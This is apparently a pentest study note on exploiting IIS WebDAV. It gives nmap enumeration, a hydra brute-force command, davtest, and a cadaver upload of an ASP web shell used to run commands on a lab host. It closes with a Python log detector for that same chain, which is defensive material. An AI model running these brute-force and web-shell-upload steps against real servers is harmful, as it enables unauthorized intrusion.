# IIS WebDAV

[Microsoft **IIS**](https://www.iis.net/) (**I**nternet **I**nformation **S**ervices) - a Microsoft proprietary extensible web server developed for use with Windows.

* Ports: **`80`** (no certificate), **`443`** (with SSL Certificate)
* Host websites and web applications
* Administrative GUI for IIS management
* Static and dynamic web pages, developed in `ASP.NET` and `PHP`
* Supported file extensions: `.asp`, `.aspx`, `.config`, `.php`

🗒️ [**WebDAV**](https://learn.microsoft.com/en-us/windows/win32/webdav/webdav-portal) (**W**eb **D**istributed **A**uthoring & **V**ersioning) - a set of HTTP protocol extensions that lets users manage files on remote web servers.

* Web server as `File server`
* Runs on top of Apache or IIS - ports `80`/`443`
* Credentials (`username` & `password`) are required to connect to the WebDAV server

**WebDAV Exploitation**

1. Check *if WebDAV is configured* to run on the IIS web server.
2. **Brute-force attack** on the WebDAV server - *identify legitimate credentials*.
3. Use the obtained credentials to *authenticate with the WebDAV* server and upload malicious code, like an `.asp` **payload**, used to execute arbitrary commands or obtain a **reverse shell** on the target.

## Tools

1. [**`davtest`**](https://www.kali.org/tools/davtest) - scanner tool used to *scan, authenticate and exploit a WebDAV server, by uploading test executable files which allow for command execution on the target.* Pre-installed on Kali Linux and Parrot OS.
2. [**`cadaver`**](https://www.kali.org/tools/cadaver/) - supports file *upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking*. Pre-installed on Kali Linux and Parrot OS.

## Exploitation

```
nmap -p80 --script http-enum -sV 10.3.26.115

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-enum: 
|_  /webdav/: Potentially interesting folder (401 Unauthorized)
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

# 401 Unauthorized - authentication is enabled
```

## Hydra

* Try `hydra` to brute force WebDAV in this case

```
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt <ip address> http-get /webdav/
```

In this case, no credentials matched.

## Davtest

Now we will try the Davtest tool to see which file extensions and formats the server supports.

### NOTE: The Davtest tool requires legitimate credentials to authenticate with

```
davtest -auth username:password -url http://<ip address>/webdav
```

<figure><img src="https://2323754756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqOzKV4VHdQXzOvQKF5XH%2Fuploads%2F3N19GrWu2zj9ZWMiVF9w%2Fimage.png?alt=media&#x26;token=2b9f060d-3212-4d53-9632-8ee2636da25c" alt="" width="563"><figcaption></figcaption></figure>

## Cadaver

* Use `cadaver` to upload an `.asp` payload to the `/webdav` directory

Use cadaver to log in with the following command:

```
cadaver http://10.3.26.115/webdav
```

```
dav:/webdav/> ls
# commands can be used on the web server dav directory
```

Upload your payload using the following command:

```
dav:/webdav/> put /usr/share/webshells/asp/webshell.asp
```

* Access the backdoor using the browser
  * `http://10.3.26.115/webdav/webshell.asp`
* Windows commands can be provided in the box

<figure><img src="https://2323754756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqOzKV4VHdQXzOvQKF5XH%2Fuploads%2Fx1m1gEYKkgLjGcFU4sEX%2Fimage.png?alt=media&#x26;token=ebda058b-8073-48f9-95e7-4ee124e2b9a8" alt="" width="563"><figcaption></figcaption></figure>
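
On the defensive side, the chain walked through above (repeated `401` responses on `/webdav/`, a `PUT` of a script file, then a request to that file) is visible in IIS W3C logs. The following is an added example, not part of the original page, of how that sequence can be flagged; the `/webdav` prefix, the threshold of 5, the user `bob` and the sample log lines are assumptions constructed for illustration.

```python
from collections import Counter

SCRIPT_EXT = (".asp", ".aspx", ".config", ".php")  # extensions the page lists for IIS
DAV_PREFIX = "/webdav"   # assumption: the WebDAV directory from the walkthrough
FAIL_THRESHOLD = 5       # assumption: 401s per client before flagging

def parse_w3c(lines):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def detect(lines):
    """Return (ip, finding, path) tuples for the auth-failure/upload/run chain."""
    failures, uploaded, findings = Counter(), {}, []
    for r in parse_w3c(lines):
        ip, stem = r["c-ip"], r["cs-uri-stem"].lower()
        method, status = r["cs-method"].upper(), r["sc-status"]
        if not stem.startswith(DAV_PREFIX):
            continue
        if status == "401":
            failures[ip] += 1
            if failures[ip] == FAIL_THRESHOLD:  # report once per client
                findings.append((ip, "auth-failures", stem))
        elif method == "PUT" and status in ("201", "204") and stem.endswith(SCRIPT_EXT):
            uploaded[stem] = ip
            findings.append((ip, "script-upload", stem))
        elif method in ("GET", "POST") and status == "200" and stem in uploaded:
            findings.append((ip, "uploaded-script-run", stem))
    return findings

# Constructed sample log (not from the original page); 10.0.0.5 is a made-up client.
SAMPLE = ["#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status"]
SAMPLE += [f"2024-01-01 10:00:0{i} GET /webdav/ - 10.0.0.5 401" for i in range(6)]
SAMPLE += [
    "2024-01-01 10:01:00 PUT /webdav/webshell.asp bob 10.0.0.5 201",
    "2024-01-01 10:01:05 GET /webdav/webshell.asp bob 10.0.0.5 200",
    "2024-01-01 10:02:00 GET /index.html - 10.0.0.9 200",
]

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```

Legitimate WebDAV clients also receive an initial `401` before they authenticate, so the threshold should be tuned against normal traffic for the site.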


